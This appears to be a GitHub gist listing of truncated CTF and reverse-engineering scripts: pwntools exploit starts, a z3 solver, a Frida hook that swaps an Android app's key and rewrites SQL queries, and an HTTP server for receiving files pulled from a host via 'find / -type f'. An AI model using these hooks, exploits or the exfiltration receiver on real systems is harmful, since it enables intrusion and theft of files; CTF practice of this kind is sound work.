sudhackar / solve.py
Last active February 16, 2018 16:46
solve over adb
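# Capture the attached Android device's screen over adb and load it for
# pixel inspection.
import os
import subprocess

# Write the PNG straight from adb's stdout and fail loudly when adb exits
# non-zero. The previous os.system() call discarded the exit status, so a
# failed capture left a stale or empty screen.png for the code below to read.
with open("screen.png", "wb") as png:
    subprocess.check_call(["adb", "exec-out", "screencap", "-p"], stdout=png)

from PIL import Image

img = Image.open("screen.png")

# Start coordinates and step consumed by the loop that follows.
# NOTE(review): presumably tuned to one device's screen resolution -- confirm
# before running against a different device.
xi = 32
yi = 240
delta = 6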
for j in xrange(12):
sudhackar / pivotal.elf
Last active February 19, 2018 06:20
Easy ROP exercises
sudhackar / quad-crackme.py
Last active May 23, 2018 10:29
Source for Nullcon HackIM 2018 RE 150 Quad Math
def genf(a,b,i):
    """Build the C source of one generated check function.

    The template defines ``void f<N>()``, which sets the variable ``fin`` to 1
    when either of two quadratic expressions over ``flag[...]`` is non-zero,
    and to 0 when both evaluate to zero.

    NOTE(review): the ``%c - %c`` comment slot suggests ``a`` and ``b`` are the
    two characters the pair of quadratics is derived from and ``i`` selects
    the flag index -- confirm against the formatting call, which lies past the
    visible part of this listing.
    """
    # Placeholders are filled with %-formatting; the text inside the literal is
    # emitted verbatim as C code, so it must not be reflowed.
    stub = '''void f%d(){ // %c - %c
if (((int)(flag[%d])*(int)(flag[%d]) + %d * (int)(flag[%d]) + %d ) || ((int)(flag[%d])*(int)(flag[%d]) + %d * (int)(flag[%d]) + %d )){
fin = 1;
}
else{
fin = 0;
}
}'''
from pwn import *
# Parse the challenge binary and the analyst machine's libc so symbols and
# offsets can be looked up by name.
# NOTE(review): offsets read from this libc are only meaningful for a target
# running the same libc build.
e = ELF("./leak")
l = ELF("/lib/x86_64-linux-gnu/libc.so.6")
# Hard-coded address inside ./leak.
# NOTE(review): a fixed address only holds if the binary is not
# position-independent, and the name suggests a pop/pop/pop/ret sequence --
# confirm both against the binary.
pppr = 0x000000000040068a
# Connect to a locally hosted instance of the service and wait for its
# first ": " prompt.
s = remote('127.0.0.1', 5000)
s.recvuntil(": ")
sudhackar / solve.py
Created January 27, 2018 13:09
problem 1.12 The Colossal Book of Short Puzzles and Problems-W. W. Norton & Company (2005)
from z3 import *
# Number of x-variables created below.
size = 10
# Create x0 .. x9 as module-level 32-bit bit-vector symbols by writing them
# into globals(); presumably so later constraints can use the bare names.
for i in xrange(size):
    globals()['x%i' % i]=BitVec('x%i' %i,32)
# These are free 32-bit symbols that are only *named* "one" and "zero".
# NOTE(review): presumably pinned to 1 and 0 by constraints further down --
# confirm, since an unconstrained symbol can take any value in a model.
one = BitVec("one", 32)
zero = BitVec("zero", 32)
sudhackar / bp_helper.py
Last active February 14, 2022 13:04
pykd bp
# Breakpoints registered so far. add_bp() appends one
# (pykd breakpoint, function name, nargs, thiscall) tuple per call.
breakpoints = []
def add_bp(symbol, nargs, thiscall):
    """Set a pykd breakpoint on a ``module!function`` symbol and record it.

    symbol   -- string split on "!"; the first field names the module and the
                second field names the function inside it.
    nargs    -- stored alongside the breakpoint, not interpreted here.
    thiscall -- stored alongside the breakpoint, not interpreted here.

    Raises IndexError when ``symbol`` contains no "!".
    """
    global breakpoints
    fields = symbol.split("!")
    module_name, function_name = fields[0], fields[1]
    target = pykd.module(module_name)
    target.reload()
    # breakCount is defined outside this function and is handed to pykd
    # together with the resolved function offset.
    handle = pykd.setBp(target.offset(function_name), breakCount)
    breakpoints.append((handle, function_name, nargs, thiscall))
    print("Breakpoint %d added %s" % (len(breakpoints), symbol))
sudhackar / Frida.js
Last active September 10, 2023 04:43
Frida hook Java functions in Android
// Frida script body: the callback passed to Java.perform() is where the Java
// class wrappers are obtained and the method replacements installed.
Java.perform(function () {
    var act1 = Java.use("CryptoUtilities");
    // Replacement for getKey(): the caller's argument is ignored and the
    // wrapped method is always invoked with the literal "v2".
    act1.getKey.implementation = function (arg1) {
        var ret = this.getKey("v2");
        return ret;
    };
    var db1 = Java.use("android.database.sqlite.SQLiteDatabase");
    // Replacement for the rawQuery(String, String[]) overload: log the SQL
    // text before and after rewriting, then run the query with "v1" changed
    // to "v2".
    // NOTE(review): if arg1 is a JavaScript string, replace() with a string
    // pattern rewrites only the first "v1" in the statement -- confirm that a
    // single substitution is intended.
    db1.rawQuery.overload('java.lang.String', '[Ljava.lang.String;').implementation = function (arg1, arg2){
        console.log(arg1,arg1.replace("v1","v2"));
        var ret = this.rawQuery(arg1.replace("v1","v2"),arg2);
sudhackar / rusty_road.py
Last active November 21, 2017 07:29
[CSAW CTF Finals 2017] Rusty Road
from pwn import *
# One table per key "U", "D", "L", "R" (presumably up/down/left/right), each
# holding ten independent empty lists.
h ={"U":[[] for i in xrange(10)], "D":[[] for i in xrange(10)], "L":[[] for i in xrange(10)], "R":[[] for i in xrange(10)]}
# Open the four input files, named after the same keys, in binary mode.
# NOTE(review): the handles are not closed anywhere in the visible part of
# the script -- confirm they are released once the data has been read.
U = open("U","rb")
D = open("D","rb")
L = open("L","rb")
R = open("R","rb")
for i in xrange(10):
sudhackar / rabbithole.py
Created November 19, 2017 14:26
[CSAW CTF Finals 2017] rabbithole
from pwn import *
class Node(object):
    """A node identified by the address it was created with."""

    def __init__(self, addr):
        # The address is the only state a node carries.
        self.addr = addr
# Parse the challenge binary so its symbol table can be walked.
e = ELF("./rabbithole")
# Starts empty; presumably filled by the loop over e.symbols that follows.
# NOTE(review): the name suggests a symbol-name -> address mapping -- confirm
# against the loop body, which is not visible in this listing.
name_addr = {}
for i in e.symbols:
sudhackar / get_files.py
Last active July 15, 2019 07:31
Server to rcv files
import BaseHTTPServer
import os
# for i in `find / -type f`; do
class Multiplier(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(s):
query = s.path.split('files')[1]
s.send_response(200)
s.send_header("Content-type", "text/plain")